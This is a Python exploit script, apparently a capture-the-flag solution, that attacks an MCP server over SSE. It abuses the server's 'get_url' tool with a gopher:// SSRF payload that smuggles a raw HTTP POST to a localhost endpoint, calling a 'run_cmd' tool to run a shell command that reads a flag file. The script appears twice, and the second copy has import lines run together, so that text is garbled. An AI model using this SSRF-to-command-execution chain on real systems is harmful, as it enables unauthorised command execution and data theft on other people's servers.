import json
from urllib.parse import quote_plus

import anyio
import httpx
from httpx import URL
from mcp.client.session import ClientSession
from mcp.client.sse import sse_client
from mcp.types import JSONRPCResponse
class AsyncClient(httpx.AsyncClient):
    """``httpx.AsyncClient`` that remembers the ``session_id`` of its last POST.

    Every call to :meth:`post` parses the target URL and stores the value of
    its ``session_id`` query parameter on the instance, so other code holding
    the same client object can read it back afterwards.
    """

    # ``session_id`` query parameter of the most recent POST URL; ``None``
    # until a POST is made, or when that URL carried no such parameter.
    session_id: str | None = None

    def post(self, *args, **kwargs):
        """Record the URL's ``session_id`` query parameter, then delegate.

        The URL is taken from the first positional argument when one is
        given, otherwise from the ``url`` keyword argument. All arguments are
        forwarded unchanged to ``httpx.AsyncClient.post`` and its result is
        returned as-is.
        """
        url = args[0] if args else kwargs.get("url")
        self.session_id = URL(url).params.get("session_id")
        return super().post(*args, **kwargs)
# Single module-level client instance; create_mcp_http_client returns this
# same object so the session_id recorded by AsyncClient.post can be read back.
client = AsyncClient(
    timeout=httpx.Timeout(30.0),
)
def create_mcp_http_client(
    headers: dict[str, str] | None = None,
    timeout: httpx.Timeout | None = None,
    auth: httpx.Auth | None = None,
) -> httpx.AsyncClient:
    """Return the shared module-level ``client``.

    The ``headers``, ``timeout`` and ``auth`` arguments are accepted so the
    function matches the factory signature it is passed as, but they are not
    used: the same pre-built client is returned on every call.
    """
    return client


def build_gopher_request():
    """Build a ``gopher://`` URL that carries a raw HTTP POST request.

    The embedded request is a JSON-RPC ``tools/call`` message (id ``114514``)
    addressed to ``/messages/?session_id=<id>``, where ``<id>`` is the
    ``session_id`` currently stored on the shared ``client``.

    Returns:
        The ``gopher://127.0.0.1:8000/_...`` URL as a string.

    Raises:
        RuntimeError: if ``client`` has not recorded a ``session_id`` yet.
    """
    session_id = client.session_id
    if session_id is None:
        # Without this guard the literal text "None" would be formatted into
        # the request line and the request would target a nonexistent session.
        raise RuntimeError("no session_id has been captured by the HTTP client yet")

    body = json.dumps(
        {
            "method": "tools/call",
            "params": {
                "name": "run_cmd",
                "arguments": {
                    "command": [
                        "sh",
                        "-c",
                        "cat /home/mcp/flag_7d1f2527449d356d094227b54415c6dc.txt",
                    ]
                },
            },
            "jsonrpc": "2.0",
            "id": 114514,
        }
    )

    # HTTP/1.1 needs CRLF after the request line and after every header, plus
    # an empty line before the body. The two trailing empty items produce the
    # final header's CRLF and that blank separator line.
    head = "\r\n".join(
        [
            f"POST /messages/?session_id={session_id} HTTP/1.1",
            "Host: xxxxx",
            "Connection: close",
            "Content-Type: application/json",
            # Content-Length counts bytes, not characters.
            f"Content-Length: {len(body.encode('utf-8'))}",
            "",
            "",
        ]
    )
    payload = head + body + "\r\n\r\n\r\n\r\n"

    # Percent-encode the whole request, then restore the characters this
    # script wants left literal: spaces as %20 rather than '+', and '/', '%'
    # and ':' unescaped.
    finalpayload = (
        quote_plus(payload)
        .replace("+", "%20")
        .replace("%2F", "/")
        .replace("%25", "%")
        .replace("%3A", ":")
    )
    return f"gopher://127.0.0.1:8000/_{finalpayload}"
async def main():
    """Open an MCP SSE session, send the gopher URL and print the reply.

    Two tasks run concurrently inside one ``ClientSession``:

    * ``read_114514_response`` registers a memory stream for request id
      ``114514`` and prints the ``stdout`` field of the first message that
      arrives on it.
    * ``send_exploit`` initializes the session, builds the gopher URL and
      passes it to the ``get_url`` tool.
    """
    async with sse_client(
        "http://example.com:8161/sse", httpx_client_factory=create_mcp_http_client
    ) as (read, write):
        async with ClientSession(read, write) as session:

            async def read_114514_response():
                """Print ``stdout`` from the first message delivered for id 114514."""
                streamer, reader = anyio.create_memory_object_stream(1)
                # NOTE(review): _response_streams is a private attribute of
                # ClientSession; this depends on the installed mcp version
                # keeping that name and routing replies through it.
                session._response_streams[114514] = streamer
                message: JSONRPCResponse
                async for message in reader:
                    print(json.loads(message.result['content'][0]['text'])['stdout'])
                    # Only the first message is wanted.
                    return

            async def send_exploit():
                """Initialize the session and call ``get_url`` with the gopher URL."""
                await session.initialize()
                payload = build_gopher_request()
                print(f"Sending payload: {payload}")
                res = await session.call_tool(
                    "get_url",
                    {"url": payload},
                )
                print(f"Received response: {res.content}")

            async with anyio.create_task_group() as tg:
                # Start the reader first so its stream is registered before
                # the request is sent.
                tg.start_soon(read_114514_response)
                tg.start_soon(send_exploit)
# Script entry point: run main() on an asyncio event loop.
if __name__ == "__main__":
    import asyncio

    asyncio.run(main())
import jsonfrom urllib.parse import quote_plus
import anyioimport httpxfrom httpx import URL
from mcp.client.session import ClientSession
from mcp.client.sse import sse_client
from mcp.types import JSONRPCResponse
class AsyncClient(httpx.AsyncClient):
    """``httpx.AsyncClient`` that remembers the ``session_id`` of its last POST.

    Every call to :meth:`post` parses the target URL and stores the value of
    its ``session_id`` query parameter on the instance, so other code holding
    the same client object can read it back afterwards.
    """

    # ``session_id`` query parameter of the most recent POST URL; ``None``
    # until a POST is made, or when that URL carried no such parameter.
    session_id: str | None = None

    def post(self, *args, **kwargs):
        """Record the URL's ``session_id`` query parameter, then delegate.

        The URL is taken from the first positional argument when one is
        given, otherwise from the ``url`` keyword argument. All arguments are
        forwarded unchanged to ``httpx.AsyncClient.post`` and its result is
        returned as-is.
        """
        url = args[0] if args else kwargs.get("url")
        self.session_id = URL(url).params.get("session_id")
        return super().post(*args, **kwargs)
# Single module-level client instance; create_mcp_http_client returns this
# same object so the session_id recorded by AsyncClient.post can be read back.
client = AsyncClient(
    timeout=httpx.Timeout(30.0),
)
def create_mcp_http_client(
    headers: dict[str, str] | None = None,
    timeout: httpx.Timeout | None = None,
    auth: httpx.Auth | None = None,
) -> httpx.AsyncClient:
    """Return the shared module-level ``client``.

    The ``headers``, ``timeout`` and ``auth`` arguments are accepted so the
    function matches the factory signature it is passed as, but they are not
    used: the same pre-built client is returned on every call.
    """
    return client


def build_gopher_request():
    """Build a ``gopher://`` URL that carries a raw HTTP POST request.

    The embedded request is a JSON-RPC ``tools/call`` message (id ``114514``)
    addressed to ``/messages/?session_id=<id>``, where ``<id>`` is the
    ``session_id`` currently stored on the shared ``client``.

    Returns:
        The ``gopher://127.0.0.1:8000/_...`` URL as a string.

    Raises:
        RuntimeError: if ``client`` has not recorded a ``session_id`` yet.
    """
    session_id = client.session_id
    if session_id is None:
        # Without this guard the literal text "None" would be formatted into
        # the request line and the request would target a nonexistent session.
        raise RuntimeError("no session_id has been captured by the HTTP client yet")

    body = json.dumps(
        {
            "method": "tools/call",
            "params": {
                "name": "run_cmd",
                "arguments": {
                    "command": [
                        "sh",
                        "-c",
                        "cat /home/mcp/flag_7d1f2527449d356d094227b54415c6dc.txt",
                    ]
                },
            },
            "jsonrpc": "2.0",
            "id": 114514,
        }
    )

    # HTTP/1.1 needs CRLF after the request line and after every header, plus
    # an empty line before the body. The two trailing empty items produce the
    # final header's CRLF and that blank separator line.
    head = "\r\n".join(
        [
            f"POST /messages/?session_id={session_id} HTTP/1.1",
            "Host: xxxxx",
            "Connection: close",
            "Content-Type: application/json",
            # Content-Length counts bytes, not characters.
            f"Content-Length: {len(body.encode('utf-8'))}",
            "",
            "",
        ]
    )
    payload = head + body + "\r\n\r\n\r\n\r\n"

    # Percent-encode the whole request, then restore the characters this
    # script wants left literal: spaces as %20 rather than '+', and '/', '%'
    # and ':' unescaped.
    finalpayload = (
        quote_plus(payload)
        .replace("+", "%20")
        .replace("%2F", "/")
        .replace("%25", "%")
        .replace("%3A", ":")
    )
    return f"gopher://127.0.0.1:8000/_{finalpayload}"
async def main():
    """Open an MCP SSE session, send the gopher URL and print the reply.

    Two tasks run concurrently inside one ``ClientSession``:

    * ``read_114514_response`` registers a memory stream for request id
      ``114514`` and prints the ``stdout`` field of the first message that
      arrives on it.
    * ``send_exploit`` initializes the session, builds the gopher URL and
      passes it to the ``get_url`` tool.
    """
    async with sse_client(
        "http://example.com:8161/sse", httpx_client_factory=create_mcp_http_client
    ) as (read, write):
        async with ClientSession(read, write) as session:

            async def read_114514_response():
                """Print ``stdout`` from the first message delivered for id 114514."""
                streamer, reader = anyio.create_memory_object_stream(1)
                # NOTE(review): _response_streams is a private attribute of
                # ClientSession; this depends on the installed mcp version
                # keeping that name and routing replies through it.
                session._response_streams[114514] = streamer
                message: JSONRPCResponse
                async for message in reader:
                    print(json.loads(message.result['content'][0]['text'])['stdout'])
                    # Only the first message is wanted.
                    return

            async def send_exploit():
                """Initialize the session and call ``get_url`` with the gopher URL."""
                await session.initialize()
                payload = build_gopher_request()
                print(f"Sending payload: {payload}")
                res = await session.call_tool(
                    "get_url",
                    {"url": payload},
                )
                print(f"Received response: {res.content}")

            async with anyio.create_task_group() as tg:
                # Start the reader first so its stream is registered before
                # the request is sent.
                tg.start_soon(read_114514_response)
                tg.start_soon(send_exploit)
# Script entry point: run main() on an asyncio event loop.
if __name__ == "__main__":
    import asyncio

    asyncio.run(main())